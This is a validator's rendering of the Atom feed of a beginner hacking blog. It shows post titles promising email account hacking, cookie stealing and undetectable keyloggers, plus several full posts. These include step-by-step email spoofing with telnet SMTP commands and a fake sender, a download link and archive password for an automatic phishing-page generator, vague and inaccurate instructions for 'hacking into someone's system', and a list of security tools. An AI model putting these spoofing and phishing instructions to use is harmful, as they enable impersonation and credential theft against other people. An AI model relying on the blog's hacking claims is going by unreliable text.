Congratulations!

[Valid Atom 1.0] This is a valid Atom 1.0 feed.

Recommendations

This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.

Source: http://dracohacker.blogspot.com/feeds/posts/default

  1. <?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1548743946762923955</id><updated>2024-03-14T02:25:01.214-07:00</updated><category term="Exploit SQL Server System"/><category term="Fool Someone Into Thinking That He Is Installing a Hack"/><category term="How to Unlock Password Protected Memory Cards"/><category term="NetBios Hacking"/><category term="Protect yourself from fake login pages"/><category term="Restart your friend’s phone using sms"/><category term="6000 Virus ready to use"/><category term="A Cool Forum To Join"/><category term="A small Registry hack to change the Recycle bin name"/><category term="AOL and MSN"/><category term="Alternate Sify Clients For Linux–Save urself from the crappy dialers"/><category term="Auto Phsher / Fake Web Login Creator"/><category term="Basic computer security tips"/><category term="Battery Doubler: double your Laptops battery’s economy"/><category term="Block The Annoying Ad Servers"/><category term="Bluetooth Intrusion Demystified"/><category term="Change XP Passwords"/><category term="Cloning Hard Drives"/><category term="Cookie Stealing"/><category term="Create your own fake login page"/><category term="Download Unlimited from Rapidshare without paying"/><category term="Download Youtube Videos in linux without any software"/><category term="Enable Right Clicks on The Sites That Disable it"/><category term="Essential Bluetooth hacking tools"/><category term="FAKE - Hack Password for Yahoo"/><category term="Fake Voice Changer"/><category term="Fastest Way To Hack into Someones System"/><category term="Few Hacks and tips for Windows XP"/><category term="File Binding : Its Like Mixing Poison In A Drink"/><category term="Find IP info using Gmail/Yahoo/Hotmail"/><category term="Game CD Keys"/><category term="Get IP address anonymity everytime"/><category term="Get Your Friends internet passwords"/><category term="Getting geographical Information using an IP Address"/><category term="Gmail"/><category term="Google"/><category term="Google - Peep Into Other’s Email Boxes"/><category term="Graphics in Ubuntu 8.04 are awesome"/><category term="Hack - View Locked Scrapbooks"/><category term="Hack Orkut Accounts"/><category term="Hack This Website Test"/><category term="Hack Websites"/><category term="Hack Windows XP Password"/><category term="Hacker&#39;s Arena"/><category term="Hacking internet web cameras"/><category term="Hacks to Beat Rapidshare Download Limits and Waiting Time"/><category term="Hardcore Virus Makers"/><category term="Hide Your Files In a JPEG"/><category term="Hotmail"/><category term="How hackers used to hack through windows"/><category term="How to Format A HDD With Notepad"/><category term="How to Hack Gmail"/><category term="How to Hack Gmail or Yahoo or Hotmail or Any Other (Old Version)"/><category term="How to make ALL Trojan/Virus/Keylogger UNDETECTABLE"/><category term="I am surprised by the lack of awareness on network security at corporate level"/><category term="IF YOU ARE NOT A PREMIUM USER ON RAPIDSHARE:"/><category term="Ice Cold Reloaded"/><category term="Key Loggers | Be careful with them if some one has physical acess to your system"/><category term="Lock Folders Without Downloading any Software"/><category term="Make Windows Xp Genuine Forever"/><category term="Orkut or Any Other"/><category term="Orkut:TypeRacer Bot"/><category term="Page hits flooder"/><category term="Password Hacking"/><category term="RapidShare hacking for downloads"/><category term="Rapidshare Search Hacks"/><category term="Reset Vista and XP Admin Passwords"/><category term="SQL Injection"/><category term="Secret Backdoor to Many Websites"/><category term="Secure your blog from hackers"/><category term="Security : Clear Data written in page file before shutdown"/><category term="Send Fake Emails"/><category term="Shut Down Your School"/><category term="Some tricky Tricks of google"/><category term="Spoofing Via Telnet"/><category term="Super Bluetooth Hack"/><category term="The wait is over Ubuntu 8.04 is available for download"/><category term="Top 15 Hacking Software"/><category term="Top ten best hackers of the world"/><category term="Track IP-Address just by sending an e-mail"/><category term="Trojans | Be very careful with them"/><category term="USB Password Stealer"/><category term="WINDOWS TIPS COLLECTION"/><category term="Website Hacking"/><category term="Why Is PCLinuxOS 2007 Better Than Ubuntu ?"/><category term="Yahoo"/><category term="Yahoo and hackers - One More War"/><category term="officepoltergeist | Play pranks on your friends with this open source software"/><category term="port scanning"/><title type='text'>Draco Hacker - A Place For All Wanna be Hackers</title><subtitle type='html'>Its a blog designed by Shubham for all guys who are new in security line ans always want to do something horrible and different over internet.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default?redirect=false'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default?start-index=26&amp;max-results=25&amp;redirect=false'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>110</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-957345715729200298</id><published>2010-12-20T16:57:00.000-08:00</published><updated>2010-12-20T16:59:34.644-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacker&#39;s Arena"/><title type='text'>Hacker&#39;s Arena</title><content type='html'>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKmzsdjy5ya4mlHTyEwjbFGqQGTnaJbFLFXgGrb5C4-XKkOAM6mtPLuE_aOALWCF0AXYN5g5gHLYSodAOgyhnEQLwmk394zPYSVkwIMR3AImaftiEvHp6zWmSVVflmId1w-UW_ynhEqWk/s1600/untitled.JPG&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;227&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKmzsdjy5ya4mlHTyEwjbFGqQGTnaJbFLFXgGrb5C4-XKkOAM6mtPLuE_aOALWCF0AXYN5g5gHLYSodAOgyhnEQLwmk394zPYSVkwIMR3AImaftiEvHp6zWmSVVflmId1w-UW_ynhEqWk/s400/untitled.JPG&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
  2. guys visit here to explore more about hacking.. &lt;b&gt;&lt;a href=&quot;http://missionhacking.blogspot.com/&quot;&gt;http://missionhacking.blogspot.com/&lt;/a&gt;&lt;/b&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  3. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  4. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  5. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  6. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/957345715729200298/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=957345715729200298' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/957345715729200298'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/957345715729200298'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2010/12/hackers-arena.html' title='Hacker&#39;s Arena'/><author><name>Dwarika</name><uri>http://www.blogger.com/profile/13360848760195319448</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://1.bp.blogspot.com/-W_jh5s8NoOM/TWbB65dp2hI/AAAAAAAAAy8/jdqsU69WHuc/s220/183354_156658547723126_142402432482071_274711_5410625_n.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKmzsdjy5ya4mlHTyEwjbFGqQGTnaJbFLFXgGrb5C4-XKkOAM6mtPLuE_aOALWCF0AXYN5g5gHLYSodAOgyhnEQLwmk394zPYSVkwIMR3AImaftiEvHp6zWmSVVflmId1w-UW_ynhEqWk/s72-c/untitled.JPG" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-5157597959519519643</id><published>2008-11-29T00:23:00.001-08:00</published><updated>2008-11-29T00:23:51.443-08:00</updated><title type='text'>Fastest Way To Hack into Someones System</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;div style=&quot;text-align: justify; font-weight: bold; font-family: verdana;&quot;&gt;&lt;span class=&quot;threadText&quot;&gt;Well as I already mentioned you can hack any system as it is conected to what we call “INTERNET”. To connect internet a system allocates a port for communication and Data Transfer. So we got to do is to get into that port that is to be hacked. &lt;/span&gt;&lt;br /&gt;&lt;span class=&quot;threadText&quot;&gt;&lt;/span&gt;&lt;/div&gt; &lt;p&gt;&lt;span style=&quot;font-weight: bold; font-family: verdana;&quot; class=&quot;threadText&quot;&gt;&lt;br /&gt;Steps: -&lt;/span&gt;&lt;/p&gt; &lt;ol&gt;&lt;li&gt;&lt;span class=&quot;threadText&quot;&gt;Software PORT SCANNER from google. &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class=&quot;threadText&quot;&gt;The IP address of the victim whose port is open. &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class=&quot;threadText&quot;&gt;NETLAB which gives u all information includes victim IP address,Area  from where he is accessing internet…. &lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class=&quot;threadText&quot;&gt;The IP of victim u found initially into NETLAB .&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span class=&quot;threadText&quot;&gt;Thats it now you can access his system.&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt; &lt;p&gt;Note : This is really Hardcore Hacking and you should be very much careful while doing all this and you do all this on your own responsibility. This site is never responsible for anything you after reading any article from this site and there are almost 50-50 chances that you may get caught so don’t try this unless you are aware of everthing. Yes you can freak some of your friends by telling them that you can hack their systems very easily.&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  7. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  8. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  9. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  10. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/5157597959519519643/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=5157597959519519643' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/5157597959519519643'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/5157597959519519643'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/fastest-way-to-hack-into-someones_29.html' title='Fastest Way To Hack into Someones System'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-8469535219801319716</id><published>2008-11-29T00:22:00.000-08:00</published><updated>2008-11-29T00:23:09.031-08:00</updated><title type='text'>Get IP address anonymity everytime</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;i have found one software which hide your IP address every time and give you a new IP address by creating a Tor Network…….&lt;/p&gt; &lt;p&gt;If u have Mozilla then it works very fine&lt;/p&gt; &lt;p&gt;First Download Vidalia Bundle from here&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.torproject.org/download.html.en&quot;&gt;&lt;br /&gt;http://www.torproject.org/download.html.en&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Here is link for Windows and MAC OS ……….So download it according to your requirement .&lt;/p&gt; &lt;p&gt;After that to easily turn on and turn off “TOR” .. You can install Firefox add on from here :&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;https://addons.mozilla.org/en-US/firefox/addon/2275&quot;&gt;&lt;br /&gt;https://addons.mozilla.org/en-US/firefox/addon/2275&lt;/a&gt;&lt;/p&gt; &lt;p&gt;then restart firefox….After that you will see at right bottom corner that your tor addon for mozilla is installed…now when u want to hide your IP or want to surfing anonymously Turn on or turn off by clicking on this.&lt;/p&gt; &lt;p&gt;You can check your ip address here&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.whatismyip.com/&quot;&gt;http://www.whatismyip.com/&lt;/a&gt;&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  11. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  12. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  13. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  14. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/8469535219801319716/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=8469535219801319716' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/8469535219801319716'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/8469535219801319716'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/get-ip-address-anonymity-everytime_29.html' title='Get IP address anonymity everytime'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-5626355868848733482</id><published>2008-11-29T00:21:00.001-08:00</published><updated>2008-11-29T00:22:15.840-08:00</updated><title type='text'>Auto Phisher / Fake Web Login Creator</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;Auto Ph!$her / fake Web Login Creator&lt;br /&gt;&lt;/p&gt; &lt;p&gt;All u need to do is write in the source of the page u wanna ph!$h&lt;br /&gt;and it will make the phisher for u automatically, and it even saves it as well.&lt;/p&gt; &lt;p&gt;&lt;b&gt;Download&lt;/b&gt;&lt;br /&gt;&lt;a href=&quot;http://rapidshare.com/files/90895580/Fishing_Bait_2.5.rar&quot; target=&quot;_blank&quot;&gt;http://rapidshare.com/files/90895580/Fishing_Bait_2.5.rar&lt;/a&gt;&lt;/p&gt; &lt;p&gt;Password:  &lt;b&gt;PremSoni&lt;/b&gt;&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  15. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  16. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  17. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  18. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/5626355868848733482/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=5626355868848733482' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/5626355868848733482'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/5626355868848733482'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/auto-phisher-fake-web-login-creator.html' title='Auto Phisher / Fake Web Login Creator'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-1796947136256375890</id><published>2008-11-29T00:20:00.000-08:00</published><updated>2008-11-29T00:21:13.086-08:00</updated><title type='text'>Spoofing Via Telnet</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;Get a smtp server ( i use mx1.hotmail.com)&lt;/p&gt; &lt;p&gt;they’re normally likemx1,mx2 etc..thehost.com.&lt;/p&gt; &lt;p&gt;Now, go to Start&gt;Run&gt;cmd then in the cmd window,&lt;/p&gt; &lt;p&gt;Type telnet mx1.hotmail.com 25&lt;/p&gt; &lt;p&gt;then HELO  hotmail.com then MAIL FROM : (fake email here)&lt;/p&gt; &lt;p&gt;then RCPT TO: (person)then DATA then type your message,&lt;/p&gt; &lt;p&gt;you can press enter for a new line, finish the message by a full stop (.) on a new line, press enter!&lt;/p&gt; &lt;p&gt;spoofed.&lt;/p&gt; &lt;p&gt;For Educational purpose only&lt;/p&gt; &lt;p&gt;Didn’t it work? Go www.deadfake.com&lt;/p&gt; &lt;/div&gt;&lt;/div&gt;&lt;div class=&quot;blogger-post-footer&quot;&gt;&lt;!-- Begin BidVertiser Referral code --&gt;
  19. &lt;script language=&quot;JavaScript&quot;&gt;var bdv_ref_pid=229521;var bdv_ref_type=&#39;i&#39;;var bdv_ref_option=&#39;a&#39;;var bdv_ref_eb=&#39;0&#39;;var bdv_ref_gif_id=&#39;ref_110x32_black&#39;;var bdv_ref_width=110;var bdv_ref_height=32;&lt;/script&gt;
  20. &lt;script language=&quot;JavaScript&quot; src=&quot;http://srv.bidvertiser.com/bidvertiser/referral_button.html?pid=229521&quot;&gt;&lt;/script&gt;
  21. &lt;noscript&gt;&lt;a href=&quot;http://www.bidvertiser.com&quot;&gt;make money online&lt;/a&gt;&lt;/noscript&gt;
  22. &lt;!-- End BidVertiser Referral code --&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://dracohacker.blogspot.com/feeds/1796947136256375890/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1548743946762923955&amp;postID=1796947136256375890' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/1796947136256375890'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1548743946762923955/posts/default/1796947136256375890'/><link rel='alternate' type='text/html' href='http://dracohacker.blogspot.com/2008/11/spoofing-via-telnet_29.html' title='Spoofing Via Telnet'/><author><name>Shubham</name><uri>http://www.blogger.com/profile/11784649078387709212</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7JIriCfpaHWKXProHy89QTvm2uEJ8j7ooxwom2b-f3gqjM3ScgCHGQjOXyUZjZbjus0Tq_mPYeDxZtNyB-TnjTMWwCH_naBIOcDTW4DCqsf_kV2662mKxzvQeudxf/s220/hacker1.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1548743946762923955.post-4563822574082606771</id><published>2008-11-29T00:19:00.000-08:00</published><updated>2008-11-29T00:20:43.934-08:00</updated><title type='text'>Top 15 Hacking Software And My Favorites</title><content type='html'>&lt;div class=&quot;entry&quot;&gt; &lt;div class=&quot;snap_preview&quot;&gt;&lt;p&gt;&lt;b&gt;1. Nmap&lt;/b&gt;&lt;/p&gt; &lt;p&gt;I think everyone has heard of this one, recently evolved into the 4.x series.&lt;/p&gt; &lt;p&gt;Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.&lt;/p&gt; &lt;p&gt;Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.insecure.org/nmap/download.html&quot;&gt;Get Nmap Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;2. Nessus Remote Security Scanner&lt;/b&gt;&lt;/p&gt; &lt;p&gt;Recently went closed source, but is still essentially free. Works with a client-server framework.&lt;/p&gt; &lt;p&gt;Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.nessus.org/download/&quot;&gt;Get Nessus Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;3. John the Ripper&lt;/b&gt;&lt;/p&gt; &lt;p&gt;Yes, &lt;a href=&quot;http://www.darknet.org.uk/2006/03/jtr-password-cracking-john-the-ripper-17-released-finally/&quot;&gt;JTR 1.7 was recently released&lt;/a&gt;!&lt;/p&gt; &lt;p&gt;John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.openwall.com/john/&quot;&gt;You can get JTR Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;4. Nikto&lt;/b&gt;&lt;/p&gt; &lt;p&gt;Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).&lt;/p&gt; &lt;p&gt;Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.cirt.net/code/nikto.shtml&quot;&gt;Get Nikto Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;5. SuperScan&lt;/b&gt;&lt;/p&gt; &lt;p&gt;Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.&lt;/p&gt; &lt;p&gt;If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&amp;amp;subcontent=/resources/proddesc/superscan4.htm&quot;&gt;Get SuperScan Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;6. p0f&lt;/b&gt;&lt;/p&gt; &lt;p&gt;P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:&lt;/p&gt; &lt;p&gt;- machines that connect to your box (SYN mode),&lt;br /&gt;- machines you connect to (SYN+ACK mode),&lt;br /&gt;- machine you cannot connect to (RST+ mode),&lt;br /&gt;- machines whose communications you can observe.&lt;/p&gt; &lt;p&gt;Basically it can fingerprint anything, just by listening, it doesn’t make &lt;b&gt;ANY&lt;/b&gt; active connections to the target machine.&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://lcamtuf.coredump.cx/p0f/p0f.shtml&quot;&gt;Get p0f Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;7. Wireshark (Formely Ethereal)&lt;/b&gt;&lt;/p&gt; &lt;p&gt;Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.&lt;/p&gt; &lt;p&gt;Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.wireshark.org/&quot;&gt;Get Wireshark Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;8. Yersinia&lt;/b&gt;&lt;/p&gt; &lt;p&gt;Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).&lt;/p&gt; &lt;p&gt;The best Layer 2 kit there is.&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://yersinia.sourceforge.net/&quot;&gt;Get Yersinia Here&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;b&gt;9. Eraser&lt;/b&gt;&lt;/p&gt; &lt;p&gt;Eraser is an advanced security tool (for &lt;i&gt;Windows&lt;/i&gt;), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.&lt;/p&gt; &lt;p&gt;An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.&lt;/p&gt; &lt;p&gt;&lt;a href=&quot;http://www.heidi.ie/eraser/download.php&quot;&gt;Get Eraser Here.&lt;/a&gt;&lt;/p&gt; &lt;p&gt;&lt;!-- google_ad_client = &quot;pub-3033787195489589&quot;; google_alternate_ad_url = &quot;http://www.darknet.org.uk/google_adsense_script.html&quot;; google_ad_width = 336; google_ad_height = 280; google_ad_format = &quot;336x280_as&quot;; google_ad_type = &quot;text&quot;; google_ad_channel 